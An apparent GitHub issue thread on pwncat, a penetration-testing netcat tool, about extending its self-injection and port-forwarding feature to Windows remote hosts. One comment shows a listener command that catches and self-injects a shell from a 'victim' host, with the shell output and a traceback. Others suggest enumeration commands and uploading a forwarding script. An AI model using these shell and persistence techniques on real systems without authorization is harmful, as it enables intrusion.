Comments (5)
zweilosec
commented on May 22, 2024
1
cmd.exe - finds files in %PATH%
where $filename 2>nullFor files not in %PATH%
where /R C:\ ping.exe 2>null
Find file by name with PowerShell
Get-Childitem -Path C: -Recurse -ErrorAction SilentlyContinue | ? {$_.Name = $filename}Enumeration shouldn't be too hard, but I don't know about the self-injection part.
from pwncat.
cytopia
commented on May 22, 2024
1
I will probably first have the forwarding feature as a generated payload here: https://github.com/cytopia/kusanagi.
Once this is stable I will be looking into backporting it to pwncat automation
from pwncat.
zweilosec
commented on May 22, 2024
After playing with using the --self-inject parameter, I believe this would be the easiest way to do this as-is, if the victim was a Unix machine.
pwncat -l 1234 -v --self-inject cmd.exe:10.10.14.187:1235
[PWNCAT CnC] Checking if remote sends greeting...
Spawn Shell...
Microsoft Windows [Version 10.0.17763.1817]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>
[PWNCAT CnC] Checking if remote sends prefix/suffix to every request...
[PWNCAT CnC] Remote does not send prefix
[PWNCAT CnC] Remote does not send suffix
[PWNCAT CnC] Probing for: which python3
Traceback (most recent call last):
File "/usr/bin/pwncat", line 6352, in <module>
main()
File "/usr/bin/pwncat", line 6263, in main
CNCAutoDeploy(net, cnc_cmd, cnc_host, cnc_ports)
File "/usr/bin/pwncat", line 4968, in __init__
super(CNCAutoDeploy, self).__init__(network)
File "/usr/bin/pwncat", line 4351, in __init__
if not self.__set_remote_python_path():
File "/usr/bin/pwncat", line 4821, in __set_remote_python_path
response = self.remote_command("which {} 2>/dev/null".format(name), True)
File "/usr/bin/pwncat", line 4632, in remote_command
return self.send_recv(StringEncoder.encode(command), True, True)
File "/usr/bin/pwncat", line 4606, in send_recv
if data in responses[idx]:
IndexError: list index out of range
However, since I am testing with a Windows host as the remote machine, this fails since it requires both a Unix machine with
the which command, and python3 to be installed in the host's $PATH.
from pwncat.
cytopia
commented on May 22, 2024
However, since I am testing with a Windows host
This is still something that lacks implementation. I will have to dig a bit into cmd.exe and powershell.exe capabilities for enumeration and self injection.
from pwncat.
ghost-ng
commented on May 22, 2024
potential solution: upload this python tcp-forward script and execute; there is also a perl version on this site
https://mfnttps.github.io/mfnttps/python-portfwd/
from pwncat.
Related Issues (20)
- windows question HOT 1
- when pasting in term I donot get full line echo HOT 9
- Link to grab netcat no longer works HOT 4
- setup.py: Multiple top-level packages discovered in a flat-layout HOT 3
- Similar to #83, --self-inject does not detect python because client does not send server output of remote_command HOT 3
- TCP UDP relay
- DeprecationWarning in threading
- UDP mode not working in background on GNU/Linux HOT 8
- connection failed: channel unexpectedly closed
- Netcat Compatibility HOT 2
- Pwncat Scripting Engine (PSE)
- Be able to specify source address and port for clients
- Implement feature: Stateless UDP connect
- When upgrading TTY to interactive its crashes after performing the fg HOT 12
- Self-inject command does not find python version HOT 26
- IPv6 self injection / port forwarding HOT 2
- IPv6 link-local address causes "Invalid argument" / "Bind Error" HOT 3
- Add SSL WRAPPER
- Add Keyboard Interrupt Exception
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from pwncat.